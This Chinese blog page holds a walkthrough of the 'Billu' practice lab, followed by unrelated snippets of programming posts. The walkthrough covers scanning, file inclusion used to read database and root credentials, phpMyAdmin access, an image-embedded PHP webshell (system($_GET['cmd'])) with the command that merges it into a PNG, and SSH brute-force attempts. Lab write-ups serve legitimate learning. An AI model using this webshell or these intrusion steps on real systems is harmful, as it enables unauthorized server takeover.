当前位置：首页 > news >正文

Billu靶场黑盒盲打——思路和详解

news 2026/2/9 16:35:46

一、信息收集

1、探测内网主机IP可以使用各种扫描工具比如nmap，我这里用的是自己编写的。

nmap -n 192.168.12.0/24 #扫描IP，发现目标主机

2、先不着急，先收集一波它的端口（无果）

nmap -n 192.168.12.136 -p 1-10000 #可以看到它只有22个80

3、进入web界面查看

不错，我也是海迷！这个界面说的sql注入，尝试一番后无果，果断跳过。继续收集信息。

4、扫描路径dirb

http://192.168.12.136/in

路径中有phpinfo()

我们可以看到，有文件包含

http://192.168.12.136/test

这个界面存在文件包含

利用这个漏洞读取一波文件

通过一波搜索找到 c.php 文件为它的数据库文件连接信息

使用文件包含来把c.php直接下载下来

代码如下

直接登录phpmyadmin目录直接查看数据库

二、信息利用

1、获取了数据库账号和密码，直接登录phpmyadmin目录直接查看数据库数据

查找http://192.168.12.136/phpMyAdmin目录,在尝试几次后，人品爆发，找到了

http://192.168.12.136/phpmy/index.php

完成拖库！！

进入界面

2、文件下载利用——默认的配置文config.inc.php，应该和phpMyAdmin/index.php在同一级目录下。尝试下载

config.inc.php的内容。说实话这个东西一般人也发现不了，而且配置信息也不会这样写。

通过这个账号密码可以直接登录root用户

3、上传图片马，上传图片马的时候一定要注意，

图片原始的内容！！！！

像图片中带有 <? 这种符号的会直接影响我们的php木马的结构，导致比如system和eval无法执行。

①木马内容：

#@#$

GIF89a

<?php system($_GET['cmd']); ?>

#@#$

②使用cmd与png进行合并：

copy 111.png/b + 1.php/a 555.png

③上传图片，然后使用

4、直接使用sql语句来植入木马

1、查看sql权限可以看到，允许任意文件读取和写入。

六、它还开启了22号端口，那么直接把它的/etc/passwd下载下来，进行尝试爆破（无果）

Billu靶场黑盒盲打——思路和详解

一、信息收集 1、探测内网主机IP可以使用各种扫描工具比如nmap，我这里用的是自己编写的。 nmap -n 192.168.12.0/24 #扫描IP，发现目标主机 2、先不着急，先收集一波它的端口（无果） nmap -n 192.168.12.136 -p 1-10000…...

编程日记 2023/2/28 12:13:29

【2363. 合并相似的物品】

来源：力扣（LeetCode） 描述： 给你两个二维整数数组 items1 和 items2 ，表示两个物品集合。每个数组 items 有以下特质： items[i] [valuei, weighti] 其中 valuei 表示第 i 件物品的价值 ，we…...

编程日记 2023/2/28 12:12:22

【C++提高编程】C++全栈体系（二十四）

C提高编程第三章 STL - 常用容器九、map/ multimap容器 1. map基本概念简介： map中所有元素都是pairpair中第一个元素为key（键值），起到索引作用，第二个元素为value（实值）所有元素都会根…...

编程日记 2023/2/28 12:11:14

c++11 标准模板（STL）（std::unordered_set）（十一）

定义于头文件 <unordered_set> template< class Key, class Hash std::hash<Key>, class KeyEqual std::equal_to<Key>, class Allocator std::allocator<Key> > class unordered_set;(1)(C11 起)namespace pmr { templ…...

编程日记 2023/2/28 12:10:07

AI/CV大厂笔试LeetCode高频考题之基础核心知识点

AI/CV互联网大厂笔试LeetCode高频考题之基础核心知识点算法复习1、二叉树的遍历2、回溯算法3、二分搜索4、滑动窗口算法题5、经典动态规划6、动态规划答疑篇6.1、总结一下如何找到动态规划的状态转移关系7、编辑距离8、戳气球问题9、最长公共子序列 Longest Common Subsequence…...

编程日记 2023/2/28 12:06:48

华为OD机试题，用 Java 解【静态扫描最优成本】问题

最近更新的博客华为OD机试题，用 Java 解【停车场车辆统计】问题华为OD机试题，用 Java 解【字符串变换最小字符串】问题华为OD机试题，用 Java 解【计算最大乘积】问题华为OD机试题，用 Java 解【DNA 序列】问题华为OD机试 - 组成最大数（Java） | 机试题算法思路【2023】使…...

编程日记 2023/2/28 12:05:42

常见无线技术方案介绍

无线技术无线网络大体有两种：WAN（广域网）、PAN（个人区域网）。对于LoRa，NB-IoT，2G / 3G / 4G等无线技术，通常传输距离超过1 km，因此它们主要用于广域网（WA…...

编程日记 2023/2/28 12:04:34

收获满满的2022年

收到csdn官方的证书，感谢官方的认可！...

编程日记 2023/2/28 12:03:25

目录一、初始化阶段 constructor() static getDerivedStateFromProps() componentWillMount() / UNSAFE_componentWillMount() render()： componentDidMount() 二、运行阶段 componentWillUpdate() / UNSAFE_componentWillUpdate() render() getSnapsh…...

编程日记 2023/2/28 12:02:18

scanpy 单细胞分析API接口使用案例

参考：https://zhuanlan.zhihu.com/p/537206999 https://scanpy.readthedocs.io/en/stable/api.html scanpy python包主要分四个模块： 1）read 读写模块、 https://scanpy.readthedocs.io/en/stable/api.html#reading 2）pp Prepr…...

编程日记 2023/2/28 12:01:09

【Vue3 第二十一章】Teleport组件传送

一、基本使用场景有时我们可能会遇到这样的场景：一个组件模板的一部分在逻辑上从属于该组件，但从整个应用视图的角度来看，它在 DOM 中应该被渲染在整个 Vue 应用外部的其他地方。这类场景最常见的例子就是全屏的模态框。理想情况下&#…...

编程日记 2023/2/28 11:58:56

在 Windows Subsystem for Linux (WSL2) 的 Ubuntu 系统上配置 Vulkan 开发环境

在 Windows Subsystem for Linux (WSL2) 的 Ubuntu 系统上配置 Vulkan 开发环境Vulkan Tutorial https://vulkan-tutorial.com/ Development environment - Linux https://vulkan-tutorial.com/Development_environment 1. Vulkan - Cross platform 3D Graphics https://www…...

编程日记 2023/2/28 11:57:48

放苹果HJ61

入门题目把m个同样的苹果放在n个同样的盘子里，允许有的盘子空着不放，问共有多少种不同的分法？注意：如果有7个苹果和3个盘子，（5，1，1）和（1，5&#…...

编程日记 2023/2/28 11:56:39

Windows下，OPC UA移植，open62541移植

OPC通信标准的核心是互通性 (Interoperability) 和标准化 (Standardization) 问题。传统的OPC技术在控制级别很好地解决了硬件设备间的互通性问题，在企业层面的通信标准化是同样需要的。OPC UA之前的访问规范都是基于微软的COM/DCOM技术，这会给新增层面的通信带来不可根除的…...

编程日记 2023/2/28 11:55:27

【Tomcat与Servlet篇1】认识Tomcat与Maven

目录一、什么是Tomcat 二、Tomcat的几个重要目录 conf文件编辑 Server.xml logs文件 Webapps目录三、如何使用Tomcat 但是，如果出现了点击之后进行闪退的情况，那又是怎么回事呢？ 原因1：环境变量没有配置原因2&#…...

编程日记 2023/2/28 11:52:17

C++类和对象：拷贝构造函数和运算符重载

目录一. 拷贝构造函数 1.1 什么是拷贝构造函数 1.2 编译器默认生成的拷贝构造函数 1.3 拷贝构造函数特性总结二. 运算符重载 2.1 运算符重载概述 2.2 比较运算符重载（> > < <） 2.2.1 >运算符的重载 2.2.2 运算符的重载 2.…...

编程日记 2023/2/28 11:51:10

【IntelliJ IDEA】idea plugins搜索不出来，如何找到插件的解决方案

一、背景描述安装好IDEA后，想下载一些插件来使用，因为IDEA非常方便的一点就是插件使用非常的方便，但是经常会发现进入到插件市场无法搜索到插件的情况，这个时候就有点烦人了。那么怎么解决这个问题呢？以下会把我能想到…...

编程日记 2023/2/28 11:50:03

移动端自动化测试（一）appium环境搭建

自动化测试有主要有两个分类，接口自动化和ui自动化，ui自动化呢又分移动端的和web端的，当然还有c/s架构的，这种桌面程序应用的自动化，使用QTP，只不过现在没人做了。 web自动化呢，现在基本上都是…...

编程日记 2023/2/28 11:48:54

5 逻辑回归及Python实现

1 主要思想分类就是分割数据： 两个条件属性：直线；三个条件属性：平面；更多条件属性：超平面。使用数据： 5.1,3.5,0 4.9,3,0 4.7,3.2,0 4.6,3.1,0 5,3.6,0 5.4,3.9,0 . . . 6.2,2.9,1 5.1,2.5…...

编程日记 2023/2/28 11:47:44

技术干货 | Modelica建模秘籍之状态变量

在很多领域都有“系统”这个概念，它描述的往往是一些复杂关系的总和。假如我们将系统看做一个黑箱，那么，在系统的作用下，外界的输入有时会产生令人意想不到的输出，“蝴蝶效应”就是其中的典型案例。图1 一只南美洲亚马…...

编程日记 2023/2/28 11:46:36

线程与协程

1. 线程与协程 1.1. “函数调用级别”的切换、上下文切换 1. 函数调用级别的切换 “函数调用级别的切换”是指：像函数调用/返回一样轻量地完成任务切换。举例说明： 当你在程序中写一个函数调用： funcA() 然后 funcA 执行完后返回&…...

编程新知 2025/10/31 17:25:40

渗透实战PortSwigger靶场-XSS Lab 14：大多数标签和属性被阻止

编程新知 2026/1/24 13:05:24

多模态商品数据接口：融合图像、语音与文字的下一代商品详情体验

一、多模态商品数据接口的技术架构 （一）多模态数据融合引擎跨模态语义对齐通过Transformer架构实现图像、语音、文字的语义关联。例如，当用户上传一张“蓝色连衣裙”的图片时，接口可自动提取图像中的颜色（RGB值&…...

编程新知 2025/7/23 3:55:49

高等数学（下）题型笔记（八）空间解析几何与向量代数

目录 0 前言 1 向量的点乘 1.1 基本公式 1.2 例题 2 向量的叉乘 2.1 基础知识 2.2 例题 3 空间平面方程 3.1 基础知识 3.2 例题 4 空间直线方程 4.1 基础知识 4.2 例题 5 旋转曲面及其方程 5.1 基础知识 5.2 例题 6 空间曲面的法线与切平面 6.1 基础知识 6.2…...

编程新知 2026/1/28 9:04:29